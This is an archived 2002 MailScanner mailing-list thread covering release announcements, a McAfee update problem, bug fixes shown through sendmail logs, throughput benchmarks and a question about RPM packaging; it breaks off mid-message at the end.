on a RaQ3 and everything works perfectly. Also just ran the gfi tests and once again it works perfectly having caught everything. :-) Joe Quinn, QITC Internet Solutions (joe@qitc.co.uk) Cisco re-seller, Cobalt Sapphire Partner. www.qitc.net/stocklist Web Site Hosting, Server Hosting, Co-location. Tel: (UK) +44 776 737 1234 ----- Original Message ----- From: "Julian Field" To: Sent: Sunday, September 22, 2002 1:33 PM Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 I have just released version 3.23-1 and its equivalent V4 version. I have added traps for all known Outlook, IE and Eudora security vulnerabilities, and MailScanner now catches all of the GFI email security tests. This makes MailScanner a complete e-mail security system, rather than just being a virus scanner. See http://www.gfi.com/emailsecuritytest for information about these tests. Fixed a bug where the "domains.to.archive.conf" file would ignore complete e-mail addresses containing a '.' before a '@'. Also fixed the obvious bug in the V4 check_mailscanner script which forced you to be in the right directory when you ran check_mailscanner :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sun Sep 22 14:11:15 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 In-Reply-To: <00dc01c26237$40c80990$6501a8c0@mikedesk> References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922141044.0253ce48@imap.ecs.soton.ac.uk> At 13:54 22/09/2002, you wrote: >Getting a 404 on the V4 download. Oops, put the file in the wrong dir :( Fixed. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Sun Sep 22 16:50:03 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:43 2006 Subject: Problem with Mcafee autoupdate Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB43@lkl22.ltkalmar.se> Hi Ive tried to run the autoupdate file for uvscan but I cant get it to work. I get the following msg Mcafee update failed: cannot find the the update file, at ./autoupdate line 93 Thought I was smart and change the path in autoupdate file line 48 to "according to ftp" /pub/antivirus/datfiles/4.x/ but still get the same msg anyone got it to work? Kind regards /Anders Soon done with all the testing and will start using this at company, gona try to figure out SA as well =) From andersan at LTKALMAR.SE Sun Sep 22 17:05:55 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:43 2006 Subject: SV: Problem with Mcafee autoupdate Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB44@lkl22.ltkalmar.se> Read the wrong file =( nothing wrong with the path but the update fails. /Anders > -----Ursprungligt meddelande----- > Fr?n: Anders Andersson, IT [mailto:andersan@LTKALMAR.SE] > Skickat: den 22 september 2002 17:50 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Problem with Mcafee autoupdate > > > Hi > Ive tried to run the autoupdate file > for uvscan but I cant get it to work. > I get the following msg > Mcafee update failed: cannot find the the update file, at > ./autoupdate line > 93 > > Thought I was smart and change the path in autoupdate file > line 48 to "according to ftp" > /pub/antivirus/datfiles/4.x/ > > but still get the same msg > > anyone got it to work? > > Kind regards > > /Anders > > Soon done with all the testing and will start using this > at company, gona try to figure out SA as well =) > From LISTSERV at JISCMAIL.AC.UK Sun Sep 22 18:06:14 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:43 2006 Subject: MAILSCANNER: jason@JNJ.ORG left the list Message-ID: <200209221706.SAA05793@magpie.ecs.soton.ac.uk> Sun, 22 Sep 2002 18:06:14 jason@JNJ.ORG has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Sun, 22 Sep 2002 18:06:11 +0100 Received: from pluto.jnj.org (cs2894-211.austin.rr.com [24.28.94.211]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8MH6Br27954 for ; Sun, 22 Sep 2002 18:06:11 +0100 Received: by pluto.jnj.org (Postfix, from userid 501) id 8CCA71C05D; Sun, 22 Sep 2002 12:06:04 -0500 (CDT) Subject: From: Jason Burnett To: L-Soft list server "at JISCMAIL (1.8e)" In-Reply-To: <200209221704.g8MH44D31616@mercury.jnj.org> References: <200209221704.g8MH44D31616@mercury.jnj.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 22 Sep 2002 12:06:04 -0500 Message-Id: <1032714364.28950.44.camel@pluto> Mime-Version: 1.0 From mailscanner at ecs.soton.ac.uk Sun Sep 22 18:29:40 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: V4.00 Comments In-Reply-To: <00e301c26241$35372d40$6501a8c0@mikedesk> References: <5.1.0.14.2.20020922134849.032efa10@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922182313.024481d0@imap.ecs.soton.ac.uk> Released version 4.00.0a3. At 15:06 22/09/2002, you wrote: >Ok...I have V4.00.0a2 installed and running on a production box right >now. Here is what I notice/suggest at this point: > >1. Upon starting V4.00.0a2, the maillog still shows V4.00.0a1 Fixed. >2. In the logs: > >Sep 22 08:40:41 redline sendmail[28666]: g8MDeea28666: >from=, size=3130, class=-60, nrcpts=1, >msgid=<17b.ef38590.2abf2207@aol.com>, proto=ESMTP, daemon=MTA, >relay=icomm.ca [216.126.72.23] >Sep 22 08:40:42 redline cucipop[28668]: Opened nathanr's mailbox >Sep 22 08:40:42 redline cucipop[28668]: nathanr 192.168.0.101 0, 0 (0), >5 (537030) >Sep 22 08:40:44 redline MailScanner[28482]: Scanning 1 messages, 3568 >bytes >Sep 22 08:40:44 redline MailScanner[28482]: Saved archive copies of >g8MDeea28666 >Sep 22 08:40:44 redline MailScanner[28482]: Spam Checks: Starting >Sep 22 08:40:45 redline MailScanner[28482]: Spam Checks: Found 0 spam >messages >Sep 22 08:40:45 redline MailScanner[28482]: Virus Scanning: Starting >Sep 22 08:40:46 redline MailScanner[28482]: Virus Scanning: sophos found >1 infections >Sep 22 08:40:46 redline MailScanner[28482]: Virus Scanning: Found 0 >viruses >Sep 22 08:40:46 redline MailScanner[28482]: Other Checks: Starting >Sep 22 08:40:46 redline MailScanner[28482]: Filename Checks: Allowing >g8MDeea28666.header (no rule matched) >Sep 22 08:40:46 redline MailScanner[28482]: Filename Checks: Allowing >msg-28482-2.txt >Sep 22 08:40:46 redline MailScanner[28482]: Other Checks: Found 0 >problems >Sep 22 08:40:46 redline MailScanner[28482]: Uninfected: Delivered 1 >messages >Sep 22 08:40:46 redline MailScanner[28482]: Disinfection: Attempting to >disinfect 1 messages > >The log is showing that Sophos found 1 infection, however there was no >infection. It is doing this on every message that comes in. Is this an >error in filename rules or something? No. Turns out I was using the results output from the scan-a-batch function wrongly. As a result it was always trying to disinfect, even when there were no viruses found. Fixed. >3. In mailscanner.conf, I think the Max SpamAssassin Size = 50000 >should be increased to say 150000 by default. Otherwise, if a LARGE >HTML spam comes in and its size is 50001, SA will bypass it. It's intentionally set fairly small, as running SpamAssassin is quite heavy load on large messages. I set to 50,000 as that is bigger than 99% of spam, so will catch virtually everything while not slowing everything down processing huge messages with it. If you set the max size large, you better have lots of CPU available! > You might >also set Debug= no by default. Done. > Could you include a little documentation >on the # Address of the local Postmaster, which is used as the "From" >address in ># virus warnings sent to users. ># This can also be the filename of a ruleset. > >What is the syntax of this ruleset? I guess the question would apply to >the other possible rulesets as well. Most of the configuration options can take rulesets. Take a look in the MailScanner/etc/rules directory and you will see a couple of files there to help you out. Hope you don't mind me posting this to the list as well, it's generally useful info for everyone. >-----Original Message----- >From: Julian Field [mailto:mailscanner@ecs.soton.ac.uk] >Sent: Sunday, September 22, 2002 7:50 AM >To: Mike Kercher >Subject: RE: GFI Email Security Tests > > >At 13:47 22/09/2002, you wrote: > >That fixed it! I am now testing V4 on my middlefinger.net domain :) > >Lots of information is being logged! > >Do you reckon it's a bit too much? > > > I like it a lot at first glance! > >I think I need to upgrade to your latest release now :) > >Please keep me informed of how you get on, particularly any problems you > >find or features you like/dislike. >Thanks! > >Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From nathan at TCPNETWORKS.NET Sun Sep 22 19:33:33 2002 From: nathan at TCPNETWORKS.NET (Nathan Johanson) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <021501c26266$b35f7900$1064a8c0@ARIEL> Sometimes reading this mailing list is like waking up to a holiday day after day after day. Just when I think things can't get much better, you drop another gem in my palm. Thanks Julian! -- Nathan Johanson Email: nathan@tcpnetworks.net ----- Original Message ----- From: "Julian Field" To: Sent: Sunday, September 22, 2002 5:33 AM Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 > I have just released version 3.23-1 and its equivalent V4 version. > > I have added traps for all known Outlook, IE and Eudora security > vulnerabilities, and MailScanner now catches all of the GFI email security > tests. This makes MailScanner a complete e-mail security system, rather > than just being a virus scanner. > > See http://www.gfi.com/emailsecuritytest for information about these tests. > > Fixed a bug where the "domains.to.archive.conf" file would ignore complete > e-mail addresses containing a '.' before a '@'. > > Also fixed the obvious bug in the V4 check_mailscanner script which forced > you to be in the right directory when you ran check_mailscanner :-) > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From LISTSERV at JISCMAIL.AC.UK Sun Sep 22 20:33:21 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:43 2006 Subject: MAILSCANNER: fnord@COSANOSTRA.NET left the list Message-ID: <200209221933.UAA15411@magpie.ecs.soton.ac.uk> Sun, 22 Sep 2002 20:33:21 Elie Rosenblum has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [WWW request received from 63.67.141.78] From mailscanner at ecs.soton.ac.uk Sun Sep 22 21:09:09 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> I have fixed a couple of bugs today, and it's now even faster. Same hardware as before, same configuration, same dataset. 4.00.0a3 processed 20,000 messages in 104.6 minutes. This scales up to 275,334 messages per day. So 4.00.0a3 ran 4.0 times fast than version 3. Vrooommm, Vrrrooommmmm! :-) At 15:02 12/09/2002, you wrote: >This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. >It's not very fast by modern standards but was quite nice when I bought it >a few years ago... > >Version 3 processed 20,000 messages in 415.5 minutes. >This scales up to 69314 messages per day. > >Version 4 processes 20,000 messages in 130.3 minutes. >This scales up to 221028 messages per day. > >So version 4 ran 3.2 times faster than version 3 on the same hardware, with >the same MailScanner configuration, with the same 20,000 messages. > >Vrrrooooommmmmm........ >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Sun Sep 22 21:21:24 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:43 2006 Subject: MAILSCANNER: dougy@BRIZZIE.ORG requested to join Message-ID: <200209222021.VAA18250@magpie.ecs.soton.ac.uk> Sun, 22 Sep 2002 21:21:24 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Doug Young . The following subscription options have been requested: NOMIME DIGEST ACK NOREPRO. You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER dougy@BRIZZIE.ORG Doug Young The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+dougy%40BRIZZIE.ORG+Doug+Young&L=MAILSCANNER This first link will add the subscriber to the list. You can then set the subscription options with this link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=SET+MAILSCANNER+NOMIME+DIGEST+ACK+NOREPRO+FOR+dougy%40BRIZZIE.ORG&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From jim at ENTROPHY-FREE.NET Sun Sep 22 22:43:28 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> Message-ID: <1032731008.10742.65.camel@chaos.entrophy-free.net> On Sun, 2002-09-22 at 15:09, Julian Field wrote: > I have fixed a couple of bugs today, and it's now even faster. > Same hardware as before, same configuration, same dataset. > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > This scales up to 275,334 messages per day. > I think it might be even better than that, based on the tests that I've been doing. The test box is a 1Ghz Pentium III w/384Mb and a single IDE drive. A laptop actually, so the disk speed is on the low side. Using a parallelism of 4 I'm seeing sustained scanning rates (Sophos & SpamAssassin) of about 9400 messages/hour. That scales to some 225,600 messages per day. Due to limitations on the laptop it's a struggle to keep the input queue full all the time with the V4 code. So the actual scanning rate is probably a bit better than I'm reporting. And I'd expect to even better performance on a Dual processor box with fast SCSI disks. The test that I'm running isn't using and RBL checks but is using a High Score delete at 15. My test set up feeds messages in one "batch" sized at at time and keeps the Incoming Queue Dir at or a bit greater than the parallelism * batch size. That makes things look more like a real world scenario. I haven't yet tried any other degrees of parallelism to see where the sweet spot is, but based of running parallel makes I'd expect it to be near 4 for a single CPU. Based on other tests that I've run with the V3 code, I suspect that large input queues cause MailScanner to run slower than it's capable of in a real world scenario. On the same test box and with the same messages and as similar MailScanner V3 configuration as possible I see sustained scanning rates of 4000 messages per hour when using a batch size of 100. I haven't done extensive testing, but it looks like smaller batches are better, something like 50-100 messages and that seem to hold true for both V3 & V4. When I slam 15k messages into the input queue I don't get scanning rates nearly as good. I didn't keep the numbers for a single large queue run because I was more interested in determining the performance of what one sees on a real mail server. Perhaps I'll re-run my sample with a monster queue. BTW: If you'd like my test scenario code (a couple of perl scripts) I'd be glad to share them. -- The instructions said to use Windows 98 or better, so I installed RedHat. From hciss at HCIWS.COM Sun Sep 22 22:45:44 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> Message-ID: <025901c26281$6a608990$6401a8c0@matthewmpqowmc> When can we expect a RPM release? Matt > I have fixed a couple of bugs today, and it's now even faster. > Same hardware as before, same configuration, same dataset. > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > This scales up to 275,334 messages per day. > > So 4.00.0a3 ran 4.0 times fast than version 3. > > Vrooommm, Vrrrooommmmm! :-) From raymond at PROLOCATION.NET Sun Sep 22 22:52:18 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:43 2006 Subject: ANNOUNCE: 3.23-1 and 4.00.0a2 In-Reply-To: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: Hi Julian, > I have added traps for all known Outlook, IE and Eudora security > vulnerabilities, and MailScanner now catches all of the GFI email security > tests. This makes MailScanner a complete e-mail security system, rather > than just being a virus scanner. I just upgraded to 3.23-1, did the security check before (3.22-8) and after upgrading, compliments for the work. None is showing up anymore. Nice one, the gfi scanner, didnt see that before. Bye, Raymond. From mike at CAMAROSS.NET Sun Sep 22 22:58:47 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <025901c26281$6a608990$6401a8c0@matthewmpqowmc> Message-ID: The non-rpm was VERY simple to implement. It took all of about 2 minutes. All I did was un-tar the archive to /opt/MailScanner as instructed, set my mailscanner.conf the way I liked, and modified /etc/rc.d/init.d/mailscanner to use the new path and it was up and running. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Sunday, September 22, 2002 4:46 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Second speed test When can we expect a RPM release? Matt > I have fixed a couple of bugs today, and it's now even faster. > Same hardware as before, same configuration, same dataset. > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > This scales up to 275,334 messages per day. > > So 4.00.0a3 ran 4.0 times fast than version 3. > > Vrooommm, Vrrrooommmmm! :-) From mailscanner at ecs.soton.ac.uk Sun Sep 22 22:57:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <025901c26281$6a608990$6401a8c0@matthewmpqowmc> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922225322.03318100@imap.ecs.soton.ac.uk> At 22:45 22/09/2002, you wrote: >When can we expect a RPM release? When I'm quite happy that it works as well as I can get it to. Still finding bugs at the moment. I have to assume that people needing an rpm aren't as experienced as those who don't. Fault-finding comes with experience, so I only want the most-experienced people to be trying it now. Hope you understand, it's for your benefit (and that of your customers too). I hope I'm not being seen as condescending in any way, I'm just trying to protect everyone involved. > > I have fixed a couple of bugs today, and it's now even faster. > > Same hardware as before, same configuration, same dataset. > > > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > > This scales up to 275,334 messages per day. > > > > So 4.00.0a3 ran 4.0 times fast than version 3. > > > > Vrooommm, Vrrrooommmmm! :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From ucs_rat at SHSU.EDU Sun Sep 22 23:06:40 2002 From: ucs_rat at SHSU.EDU (Robert A. Thompson) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <1032731008.10742.65.camel@chaos.entrophy-free.net> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <1032731008.10742.65.camel@chaos.entrophy-free.net> Message-ID: <1032732400.7981.16.camel@localhost.localdomain> > When I slam 15k messages into the input queue I don't get scanning rates > nearly as good. I didn't keep the numbers for a single large queue run > because I was more interested in determining the performance of what one > sees on a real mail server. Perhaps I'll re-run my sample with a monster > queue. just a wild guess shooting from the hip, but I would guess this is b/c of the time it takes to run through queue to figure out which ones need scanning. Try running a "time mailq" or "time sendmail -bp -Q/path/to/your/mailq.in" and see how long it takes sendmail to run through it(with varying number of msg's in the queue). This may be more a limit of dealing with large number of files in a single directory 15k msg's =~ 30k files with small files that is a lot of read head movement going from file to file no matter what kind of disk you have. --rat From mailscanner at ecs.soton.ac.uk Sun Sep 22 23:13:15 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: References: <025901c26281$6a608990$6401a8c0@matthewmpqowmc> Message-ID: <5.1.0.14.2.20020922231211.02586cd8@imap.ecs.soton.ac.uk> At 22:58 22/09/2002, you wrote: >The non-rpm was VERY simple to implement. It took all of about 2 >minutes. All I did was un-tar the archive to /opt/MailScanner as >instructed, set my mailscanner.conf the way I liked, and >modified /etc/rc.d/init.d/mailscanner to use the new path and it was up >and running. Don't forget /etc/cron.hourly/check_mailscanner as well, or it will all fail in the next hour when it will try to run V3 and V4 at the same time! >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Matt >Sent: Sunday, September 22, 2002 4:46 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Second speed test > > >When can we expect a RPM release? > >Matt > > > I have fixed a couple of bugs today, and it's now even faster. > > Same hardware as before, same configuration, same dataset. > > > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > > This scales up to 275,334 messages per day. > > > > So 4.00.0a3 ran 4.0 times fast than version 3. > > > > Vrooommm, Vrrrooommmmm! :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Sun Sep 22 23:16:24 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <1032732400.7981.16.camel@localhost.localdomain> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <1032731008.10742.65.camel@chaos.entrophy-free.net> <1032732400.7981.16.camel@localhost.localdomain> Message-ID: <1032732984.10742.71.camel@chaos.entrophy-free.net> On Sun, 2002-09-22 at 17:06, Robert A. Thompson wrote: > > When I slam 15k messages into the input queue I don't get scanning rates > > nearly as good. I didn't keep the numbers for a single large queue run > > because I was more interested in determining the performance of what one > > sees on a real mail server. Perhaps I'll re-run my sample with a monster > > queue. > > just a wild guess shooting from the hip, but I would guess this is b/c > of the time it takes to run through queue to figure out which ones need > scanning. Try running a "time mailq" or "time sendmail -bp > -Q/path/to/your/mailq.in" and see how long it takes sendmail to run > through it(with varying number of msg's in the queue). This may be more > a limit of dealing with large number of files in a single directory 15k > msg's =~ 30k files with small files that is a lot of read head movement > going from file to file no matter what kind of disk you have. > Yeah, Its the time that it takes to walk the queue that's the problem. I've never bothered to see if the MailScanner code handled large dirs well because that's not what you typically see in the real world. I quess my point was that a single large queue run probably doesn't reflect the real performance of MailScanner that you'd expect to see on a real MailServer. -- The instructions said to use Windows 98 or better, so I installed RedHat. From ucs_rat at SHSU.EDU Sun Sep 22 22:48:21 2002 From: ucs_rat at SHSU.EDU (Robert A. Thompson) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <1032732984.10742.71.camel@chaos.entrophy-free.net> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <1032731008.10742.65.camel@chaos.entrophy-free.net> <1032732400.7981.16.camel@localhost.localdomain> <1032732984.10742.71.camel@chaos.entrophy-free.net> Message-ID: <1032731301.2003.49.camel@localhost.localdomain> > Yeah, Its the time that it takes to walk the queue that's the problem. > I've never bothered to see if the MailScanner code handled large dirs > well because that's not what you typically see in the real world. I > quess my point was that a single large queue run probably doesn't > reflect the real performance of MailScanner that you'd expect to see on > a real MailServer. agree. The only time I have ever had a large queue is if mailscanner dies. Which has only happened to me about 3 or 4 times(note mailscanner dieing is due to other problems out of mailscanners hands). This leaves sendmail running putting mail in the queue.in and nothing taking it out. Mailscanner gets progressively faster as it whittles down the queue. --rat From hciss at HCIWS.COM Sun Sep 22 23:33:53 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922225322.03318100@imap.ecs.soton.ac.uk> Message-ID: <028401c26288$24cb1b00$6401a8c0@matthewmpqowmc> > >When can we expect a RPM release? > > When I'm quite happy that it works as well as I can get it to. Still > finding bugs at the moment. > I have to assume that people needing an rpm aren't as experienced as those > who don't. Fault-finding comes with experience, so I only want the > most-experienced people to be trying it now. > > Hope you understand, it's for your benefit (and that of your customers > too). I hope I'm not being seen as condescending in any way, I'm just > trying to protect everyone involved. I agree but am waiting patiently for all the new bells and whistles. I have installed applications such as MRTG without an RPM but if all it takes is a week or so of patiance, I'll wait. RPM's also have an uninstall option as well I beleive. Should the version 3 Mailscanner rpm be removed before version 4 goes in? Matt From mailscanner at ecs.soton.ac.uk Sun Sep 22 23:38:32 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: V4 releases In-Reply-To: References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922233606.03337660@imap.ecs.soton.ac.uk> Point of note: I'm not going to do an announcement email for every V4 version at the moment, not until it's settled down some more. So you will need to keep an eye on the downloads page if you are trying out V4. I'm currently at 4.00.0a4. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Sun Sep 22 23:45:57 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <5.1.0.14.2.20020922231211.02586cd8@imap.ecs.soton.ac.uk> Message-ID: I remembered that after I wrote it but I was on my way back outside with the kids :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Julian Field Sent: Sunday, September 22, 2002 5:13 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Second speed test At 22:58 22/09/2002, you wrote: >The non-rpm was VERY simple to implement. It took all of about 2 >minutes. All I did was un-tar the archive to /opt/MailScanner as >instructed, set my mailscanner.conf the way I liked, and >modified /etc/rc.d/init.d/mailscanner to use the new path and it was up >and running. Don't forget /etc/cron.hourly/check_mailscanner as well, or it will all fail in the next hour when it will try to run V3 and V4 at the same time! >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Matt >Sent: Sunday, September 22, 2002 4:46 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Second speed test > > >When can we expect a RPM release? > >Matt > > > I have fixed a couple of bugs today, and it's now even faster. > > Same hardware as before, same configuration, same dataset. > > > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > > This scales up to 275,334 messages per day. > > > > So 4.00.0a3 ran 4.0 times fast than version 3. > > > > Vrooommm, Vrrrooommmmm! :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From hciss at HCIWS.COM Sun Sep 22 23:42:16 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <1032731008.10742.65.camel@chaos.entrophy-free.net> <1032732400.7981.16.camel@localhost.localdomain> <1032732984.10742.71.camel@chaos.entrophy-free.net> <1032731301.2003.49.camel@localhost.localdomain> Message-ID: <028801c26289$507cc130$6401a8c0@matthewmpqowmc> > agree. The only time I have ever had a large queue is if mailscanner > dies. Which has only happened to me about 3 or 4 times(note mailscanner > dieing is due to other problems out of mailscanners hands). This leaves > sendmail running putting mail in the queue.in and nothing taking it > out. Mailscanner gets progressively faster as it whittles down the > queue. We have seen Mailscanner with somewhere around a thousand messages in its queue. A new Internet user we signed up had a virus that was sending out messages non-stop for a few hours. We run a Raq4i and it was complaining about running out of room on home or something. A lot of the messages were sent to non-existant address and where pooled for retry. I had to go in and update the cleanquartine.sh to remove at 1 day to free enough disk space to keep the Raq running. It took the Raq a week to fully recover and purge all the messages out. Matthew From mailscanner at ecs.soton.ac.uk Sun Sep 22 23:43:56 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <028401c26288$24cb1b00$6401a8c0@matthewmpqowmc> References: <5.1.0.14.2.20020912100341.035e9008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922225322.03318100@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020922234017.033f2008@imap.ecs.soton.ac.uk> At 23:33 22/09/2002, you wrote: > > >When can we expect a RPM release? > > > > When I'm quite happy that it works as well as I can get it to. Still > > finding bugs at the moment. > > I have to assume that people needing an rpm aren't as experienced as those > > who don't. Fault-finding comes with experience, so I only want the > > most-experienced people to be trying it now. > > > > Hope you understand, it's for your benefit (and that of your customers > > too). I hope I'm not being seen as condescending in any way, I'm just > > trying to protect everyone involved. > >I agree but am waiting patiently for all the new bells and whistles. I have >installed applications such as MRTG without an RPM but if all it takes is a >week or so of patiance, I'll wait. RPM's also have an uninstall option as >well I beleive. Should the version 3 Mailscanner rpm be removed before >version 4 goes in? See Mike Kercher's earlier comment on this thread (and my followup to it). That should get you started... It's likely to be well over a week before I'm confident enough to release a non-alpha/beta version. Remember that all your mail is trusted to my code, and I don't 